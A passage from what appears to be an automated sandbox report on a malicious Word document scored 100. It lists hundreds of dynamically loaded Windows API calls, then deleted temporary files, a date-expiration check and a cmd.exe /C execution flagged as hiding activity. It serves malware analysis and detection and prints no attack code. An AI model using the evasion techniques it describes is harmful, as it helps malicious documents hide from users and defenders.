OLEAUT32.dll/VarInt - DynamicLoader: OLEAUT32.dll/VarNeg - DynamicLoader: OLEAUT32.dll/VarNot - DynamicLoader: OLEAUT32.dll/VarRound - DynamicLoader: OLEAUT32.dll/VarCmp - DynamicLoader: OLEAUT32.dll/VarDecAdd - DynamicLoader: OLEAUT32.dll/VarDecCmp - DynamicLoader: OLEAUT32.dll/VarBstrCat - DynamicLoader: OLEAUT32.dll/VarCyMulI4 - DynamicLoader: OLEAUT32.dll/VarCyMul - DynamicLoader: OLEAUT32.dll/VarCyInt - DynamicLoader: OLEAUT32.dll/VarCyFix - DynamicLoader: OLEAUT32.dll/VarBstrCmp - DynamicLoader: ole32.dll/CoCreateInstanceEx - DynamicLoader: ole32.dll/CLSIDFromProgIDEx - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/MsoMultiByteToWideChar - DynamicLoader: ADVAPI32.dll/RegEnumKeyW - DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid - DynamicLoader: mso.dll/ - DynamicLoader: OLEAUT32.dll/RegisterTypeLibForUser

Page 13 Date: 2020-05-24 16:33:21

Page 14: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

- DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: ole32.dll/OleInitialize - DynamicLoader: ole32.dll/OleUninitialize - DynamicLoader: ole32.dll/CoCreateInstance - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/

Page 14 Date: 2020-05-24 16:33:21

Page 15: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

- DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: VBE7.DLL/ - DynamicLoader: VBE7.DLL/ - DynamicLoader: VBE7.DLL/ - DynamicLoader: VBE7.DLL/ - DynamicLoader: SHELL32.DLL/ShellExecuteExW - DynamicLoader: ole32.dll/OleInitialize - DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore - DynamicLoader: propsys.dll/PSPropertyBag_WriteDWORD - DynamicLoader: propsys.dll/PSPropertyBag_ReadDWORD - DynamicLoader: propsys.dll/PSPropertyBag_ReadBSTR - DynamicLoader: propsys.dll/PSPropertyBag_ReadStrAlloc - DynamicLoader: propsys.dll/ - DynamicLoader: ADVAPI32.dll/RegOpenKeyExW - DynamicLoader: ADVAPI32.dll/RegGetValueW - DynamicLoader: ADVAPI32.dll/RegCloseKey - DynamicLoader: ole32.dll/CoTaskMemRealloc - DynamicLoader: propsys.dll/InitPropVariantFromStringAsVector - DynamicLoader: propsys.dll/PSCoerceToCanonicalValue - DynamicLoader: propsys.dll/PropVariantToStringAlloc - DynamicLoader: ole32.dll/CoAllowSetForegroundWindow - DynamicLoader: ole32.dll/CoCreateInstance - DynamicLoader: ADVAPI32.dll/SaferGetPolicyInformation - DynamicLoader: ntdll.dll/RtlDllShutdownInProgress - DynamicLoader: Comctl32.dll/ - DynamicLoader: ole32.dll/OleUninitialize - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/

Page 15 Date: 2020-05-24 16:33:21

Page 16: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

- DynamicLoader: mso.dll/ - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: GDI32.dll/GdiTransparentBlt - DynamicLoader: GDI32.dll/GdiAlphaBlend - DynamicLoader: GDI32.dll/GdiGradientFill - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: GdiPlus.dll/GdipClosePathFigure - DynamicLoader: GdiPlus.dll/GdipCreatePen1 - DynamicLoader: GdiPlus.dll/GdipSetPenLineCap197819 - DynamicLoader: GdiPlus.dll/GdipSetPenLineJoin - DynamicLoader: GdiPlus.dll/GdipSetPenMiterLimit - DynamicLoader: GdiPlus.dll/GdipAddPathLine - DynamicLoader: GdiPlus.dll/GdipCreateFromHDC - DynamicLoader: GdiPlus.dll/GdipSetPixelOffsetMode - DynamicLoader: GdiPlus.dll/GdipSetSmoothingMode - DynamicLoader: GdiPlus.dll/GdipSetCompositingQuality - DynamicLoader: GdiPlus.dll/GdipSetPageUnit - DynamicLoader: GdiPlus.dll/GdipSetInterpolationMode - DynamicLoader: GdiPlus.dll/GdipGetSmoothingMode - DynamicLoader: GdiPlus.dll/GdipTransformPoints - DynamicLoader: GdiPlus.dll/GdipCreateMetafileFromWmfFile - DynamicLoader: GdiPlus.dll/GdipGetImageType - DynamicLoader: GdiPlus.dll/GdipCreateRegion - DynamicLoader: GdiPlus.dll/GdipGetClip - DynamicLoader: GdiPlus.dll/GdipSetClipPath - DynamicLoader: GdiPlus.dll/GdipCreateImageAttributes - DynamicLoader: GdiPlus.dll/GdipSetImageAttributesWrapMode - DynamicLoader: GdiPlus.dll/GdipGetMetafileHeaderFromMetafile - DynamicLoader: GdiPlus.dll/GdipConvertToEmfPlus - DynamicLoader: kernel32.dll/RegOpenKeyExW - DynamicLoader: kernel32.dll/RegQueryInfoKeyA - DynamicLoader: kernel32.dll/RegCloseKey - DynamicLoader: kernel32.dll/RegCreateKeyExW - DynamicLoader: kernel32.dll/RegQueryValueExW - DynamicLoader: GdiPlus.dll/GdipGetImageBounds - DynamicLoader: GdiPlus.dll/GdipGetInterpolationMode - DynamicLoader: GdiPlus.dll/GdipDrawImagePointsRect - DynamicLoader: GdiPlus.dll/GdipDisposeImageAttributes - DynamicLoader: GdiPlus.dll/GdipSetClipRegion - DynamicLoader: GdiPlus.dll/GdipDeleteRegion - DynamicLoader: GdiPlus.dll/GdipDisposeImage - DynamicLoader: GdiPlus.dll/GdipDeleteGraphics - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: USP10.DLL/ScriptItemizeOpenType - DynamicLoader: USP10.DLL/ScriptShapeOpenType

Page 16 Date: 2020-05-24 16:33:21

Page 17: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

- DynamicLoader: USP10.DLL/ScriptPlaceOpenType - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: GdiPlus.dll/GdipAddPathRectangle - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: GdiPlus.dll/GdipDeletePen - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: GdiPlus.dll/GdipCreateSolidFill - DynamicLoader: mso.dll/ - DynamicLoader: GdiPlus.dll/GdipSetSolidFillColor - DynamicLoader: mso.dll/ - DynamicLoader: GdiPlus.dll/GdipGetPointCount - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: GdiPlus.dll/GdipGetVisibleClipBoundsI - DynamicLoader: mso.dll/ - DynamicLoader: GdiPlus.dll/GdipCreateMatrix - DynamicLoader: mso.dll/ - DynamicLoader: GdiPlus.dll/GdipSetMatrixElements - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: GdiPlus.dll/GdipSetTextRenderingHint - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: GdiPlus.dll/GdipSetWorldTransform - DynamicLoader: mso.dll/ - DynamicLoader: GdiPlus.dll/GdipGetWorldTransform - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: GdiPlus.dll/GdipResetWorldTransform - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: GdiPlus.dll/GdipSetClipRectI - DynamicLoader: mso.dll/ - DynamicLoader: USP10.DLL/ScriptItemize - DynamicLoader: USP10.DLL/ScriptPlace - DynamicLoader: USP10.DLL/ScriptShape - DynamicLoader: USP10.DLL/ScriptItemizeOpenType - DynamicLoader: USP10.DLL/ScriptPlaceOpenType - DynamicLoader: USP10.DLL/ScriptShapeOpenType - DynamicLoader: USP10.DLL/ScriptJustify

Page 17 Date: 2020-05-24 16:33:21

Page 18: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

- DynamicLoader: USP10.DLL/ScriptTextOut - DynamicLoader: USP10.DLL/ScriptCPtoX - DynamicLoader: USP10.DLL/ScriptXtoCP - DynamicLoader: USP10.DLL/ScriptFreeCache - DynamicLoader: USP10.DLL/ScriptCacheGetHeight - DynamicLoader: USP10.DLL/ScriptGetCMap - DynamicLoader: USP10.DLL/ScriptLayout - DynamicLoader: USP10.DLL/ScriptBreak - DynamicLoader: USP10.DLL/ScriptIsComplex - DynamicLoader: USP10.DLL/ScriptGetFontFeatureTags - DynamicLoader: USP10.DLL/ScriptGetFontScriptTags - DynamicLoader: USP10.DLL/ScriptGetFontLanguageTags - DynamicLoader: USP10.DLL/ScriptGetLogicalWidths - DynamicLoader: USP10.DLL/ScriptApplyLogicalWidth - DynamicLoader: USP10.DLL/ScriptGetGlyphABCWidth - DynamicLoader: USP10.DLL/ScriptCacheGetHeight - DynamicLoader: USP10.DLL/ScriptGetGlyphABCWidth - DynamicLoader: USP10.DLL/ScriptGetFontProperties - DynamicLoader: USP10.DLL/ScriptApplyDigitSubstitution - DynamicLoader: USP10.DLL/ScriptRecordDigitSubstitution - DynamicLoader: USP10.DLL/ScriptGetProperties - DynamicLoader: USP10.DLL/ScriptGetFontAlternateGlyphs - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: GdiPlus.dll/GdipGetRegionHRgn - DynamicLoader: mso.dll/ - DynamicLoader: GdiPlus.dll/GdipGetDC - DynamicLoader: mso.dll/ - DynamicLoader: GdiPlus.dll/GdipGetMatrixElements - DynamicLoader: mso.dll/ - DynamicLoader: GDI32.dll/GdiIsMetaPrintDC - DynamicLoader: mso.dll/ - DynamicLoader: GdiPlus.dll/GdipReleaseDC - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: GdiPlus.dll/GdipDeleteBrush - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: OLEAUT32.dll/SysAllocString - DynamicLoader: OLEAUT32.dll/SysStringLen - DynamicLoader: OLEAUT32.dll/SysFreeString - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/

Page 18 Date: 2020-05-24 16:33:21

Page 19: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

- DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: kernel32.dll/HeapSetInformation - DynamicLoader: msproof7.dll/DllGetClassObject - DynamicLoader: msproof7.dll/DllCanUnloadNow - DynamicLoader: ADVAPI32.dll/EventWrite - DynamicLoader: ADVAPI32.dll/EventRegister - DynamicLoader: ADVAPI32.dll/EventUnregister - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: ADVAPI32.dll/NotifyServiceStatusChangeW - DynamicLoader: GdiPlus.dll/GdipLoadImageFromStreamICM - DynamicLoader: WindowsCodecs.dll/DllGetClassObject - DynamicLoader: kernel32.dll/WerRegisterMemoryBlock - DynamicLoader: GdiPlus.dll/GdipGetImageRawFormat - DynamicLoader: GdiPlus.dll/GdipGetImageFlags - DynamicLoader: GdiPlus.dll/GdipGetImageWidth - DynamicLoader: GdiPlus.dll/GdipGetImageHeight - DynamicLoader: GdiPlus.dll/GdipGetImagePixelFormat - DynamicLoader: GdiPlus.dll/GdipGetImageHorizontalResolution - DynamicLoader: GdiPlus.dll/GdipGetImageVerticalResolution - DynamicLoader: GdiPlus.dll/GdipImageGetFrameCount - DynamicLoader: mso.dll/ - DynamicLoader: GdiPlus.dll/GdipAddPathPolygon - DynamicLoader: GdiPlus.dll/GdipClonePen - DynamicLoader: GdiPlus.dll/GdipSetPenStartCap - DynamicLoader: GdiPlus.dll/GdipSetPenEndCap - DynamicLoader: GdiPlus.dll/GdipCreateBitmapFromGraphics - DynamicLoader: GdiPlus.dll/GdipGetImageGraphicsContext - DynamicLoader: GdiPlus.dll/GdipTranslateWorldTransform - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: GdiPlus.dll/GdipCreateCachedBitmap - DynamicLoader: GdiPlus.dll/GdipDrawCachedBitmap - DynamicLoader: ADVAPI32.dll/NotifyServiceStatusChangeW - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: CRYPTSP.dll/CryptGenKey - DynamicLoader: CRYPTSP.dll/CryptImportKey - DynamicLoader: CRYPTSP.dll/CryptDestroyKey - DynamicLoader: CRYPTSP.dll/CryptSetHashParam - DynamicLoader: CRYPTSP.dll/CryptHashData - DynamicLoader: CRYPTSP.dll/CryptGetHashParam - DynamicLoader: CRYPTSP.dll/CryptDestroyHash - DynamicLoader: unidrvui.dll/DrvDeviceCapabilities - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject

Page 19 Date: 2020-05-24 16:33:21

Page 20: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

- DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: mso.dll/ - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: FontSub.dll/CreateFontPackage - DynamicLoader: prntvpt.dll/PTOpenProvider - DynamicLoader: prntvpt.dll/PTCloseProvider - DynamicLoader: prntvpt.dll/PTConvertDevModeToPrintTicket - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: unidrvui.dll/DrvDeviceCapabilities - DynamicLoader: mxdwdui.DLL/DllGetClassObject - DynamicLoader: mxdwdui.DLL/DllCanUnloadNow - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount - DynamicLoader: MSLID.DLL/ - DynamicLoader: MSLID.DLL/ - DynamicLoader: MSLID.DLL/ - DynamicLoader: MSLID.DLL/ - DynamicLoader: MSLID.DLL/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/

Page 20 Date: 2020-05-24 16:33:21

Page 21: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

- DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: VBE7.DLL/ - DynamicLoader: VBE7.DLL/ - DynamicLoader: VBE7.DLL/ - DynamicLoader: VBE7.DLL/ - DynamicLoader: VBE7.DLL/ - DynamicLoader: VBE7.DLL/ - DynamicLoader: VBE7.DLL/ - DynamicLoader: VBE7.DLL/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: Comctl32.dll/RemoveWindowSubclass - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: USP10.DLL/ScriptFreeCache - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/

Page 21 Date: 2020-05-24 16:33:21

Page 22: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

- DynamicLoader: mso.dll/ - DynamicLoader: MSPTLS.DLL/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: VBE7.DLL/DllVbeTerm - DynamicLoader: ole32.dll/DllDebugObjectRPCHook - DynamicLoader: VBE7.DLL/DllCanUnloadNow - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: CRYPTSP.dll/CryptReleaseContext - DynamicLoader: USER32.dll/UnregisterPowerSettingNotification - DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification - DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification - DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification - DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification - DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification - DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification - DynamicLoader: ADVAPI32.dll/EventUnregister - DynamicLoader: dwmapi.dll/DwmIsCompositionEnabled - DynamicLoader: dwmapi.dll/DwmGetColorizationColor - DynamicLoader: kernel32.dll/GetProductInfo - DynamicLoader: kernel32.dll/GetUserGeoID - DynamicLoader: msi.dll/DllGetVersion - DynamicLoader: GdiPlus.dll/GdipDeleteCachedBitmap - DynamicLoader: mso.dll/ - DynamicLoader: mso.dll/ - DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids - DynamicLoader: Comctl32.dll/ - DynamicLoader: CRYPTSP.dll/CryptReleaseContext - DynamicLoader: kernel32.dll/SetThreadUILanguage - DynamicLoader: kernel32.dll/CopyFileExW - DynamicLoader: kernel32.dll/IsDebuggerPresent - DynamicLoader: kernel32.dll/SetConsoleInputExeNameW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: kernel32.dll/SetThreadUILanguage - DynamicLoader: kernel32.dll/CopyFileExW - DynamicLoader: kernel32.dll/IsDebuggerPresent - DynamicLoader: kernel32.dll/SetConsoleInputExeNameW

Anomalous file deletion behavior detected (10+)

- DeletedFile: C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.MSO\41999E57.wmf - DeletedFile: C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.MSO\F772317D.wmf - DeletedFile: C:\Users\Seven01\AppData\Local\Microsoft\Schemas\MS Word_restart.xml - DeletedFile: C:\Users\Seven01\AppData\Local\Temp\~$019-01 - DeletedFile: C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.Word\~WRS{65BB05ED-0D55-4B03-A97B-41ADF961D074}.tmp - DeletedFile: C:\Users\Seven01\AppData\Roaming\Microsoft\Templates\~$Normal.dotm - DeletedFile: C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.Word\~WRS{FA1F001F-0EF9-40D8-B382-DDE7CB88A2FC}.tmp - DeletedFile: C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.MSO\62B46C.wmf - DeletedFile: C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet

Page 22 Date: 2020-05-24 16:33:21

Page 23: Infosec Binary Analisys 2019-01€¦ · Infosec Binary Analisys 2019-01 MalScore: 100 File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code

Infosec Binary Analisys

Files\Content.MSO\28E4682E.wmf - DeletedFile: C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.MSO\62B46C.wmf - DeletedFile: C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.MSO\F772317D.wmf - DeletedFile: C:\Users\Seven01\AppData\Local\Temp\CVR4953.tmp.cvr - DeletedFile: C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary InternetFiles\Content.Word\~WRF{F7E59D34-2360-4BE7-8C3F-26A2519BD4CB}.tmp

Possible date expiration check, exits too soon after checking local time

- process: cmd.exe, PID 1300

Executed a command line with /C or /R argument to terminate command shell on completion whichcan be used to hide execution

